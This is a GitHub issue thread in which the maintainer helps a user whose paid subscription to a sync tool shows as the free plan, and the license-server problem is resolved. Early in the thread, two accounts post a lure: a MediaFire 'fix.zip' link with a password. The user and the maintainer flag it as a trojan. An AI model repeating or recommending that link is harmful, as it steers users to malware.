### ISSUE TITLE
What happened with my subscribe?

### ISSUE THREAD

**Issue by Balk128** [pvisionjp/redsync#68] opened 2024-08-26 08:57 UTC
Hello, can you help me?
I paid for subcsribe. But sinchronization does,t work and I see that i'm on free plan.
![Screenshot_1870](https://github.com/user-attachments/assets/3e8f7101-547d-4921-a86d-b3e4db1db585)
![Screenshot_1871](https://github.com/user-attachments/assets/70b9374c-dc61-4a98-ab2b-f05293421433)

**Comment by llowvxe** [comment] 2024-08-26 08:57
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment] 2024-08-26 08:58
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Balk128** [comment] 2024-08-26 09:24
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."
What a...????
@pvisionjp @llowvxe 
Trojan in file!
![Screenshot_1875](https://github.com/user-attachments/assets/39118108-59fc-4390-85c2-68ecca53f603)

**Comment by pvisionjp** [comment] 2024-08-26 10:45
Caution!!
llowvxe has no relation to us and seems to be trying to plant malware.
---------------------------------------------------------

Hello,

Sorry for any inconvenience caused by this.

I have observed the same error in my environment.
Since access to Optro’s license server is failing, I have requested support from Optro.
I will update you as soon as I have any progress.

Best regards,
Tateo

**Comment by Balk128** [comment] 2024-08-27 04:53
> ## Caution!!
> llowvxe has no relation to us and seems to be trying to plant malware.
> Hello,
> 
> Sorry for any inconvenience caused by this.
> 
> I have observed the same error in my environment. Since access to Optro’s license server is failing, I have requested support from Optro. I will update you as soon as I have any progress.
> 
> Best regards, Tateo

Hello! Have you a good news for me?
Last night I had another transaction, but service still doesn't work...

**Comment by pvisionjp** [comment] 2024-08-27 08:43
Hello,

Could you please recheck it?

I just got a response from Optro today requesting additional information.
Therefore, I checked it in my environment but found the error disappeared.

# Sorry to have kept you waiting. 
# Optro is usually very responsive, but it seems that yesterday was a holiday in the UK (their home).

Best regards,
Tateo

**Comment by pvisionjp** [comment] 2024-08-27 08:50
Hello,

I just got a new message from Optro.  
They said they fixed the issue and requested confirmation of whether this error was resolved.

You may need to clear your browser's cache and reload the page for the board.

Best regards,
Tateo

**Comment by pvisionjp** [comment] 2024-08-27 11:37
Hello,

Thank you for your confirmation.
I’m glad we could resolve the issue and appreciate your patience.

Best regards,
Tateo

**Comment by pvisionjp** [comment] 2024-08-28 01:25
I am closing this issue.
Feel free to reach out if you have any more questions or need any more help in the future.

**Closed by pvisionjp** 2024-08-28 01:25 UTC
Labels: platform issue
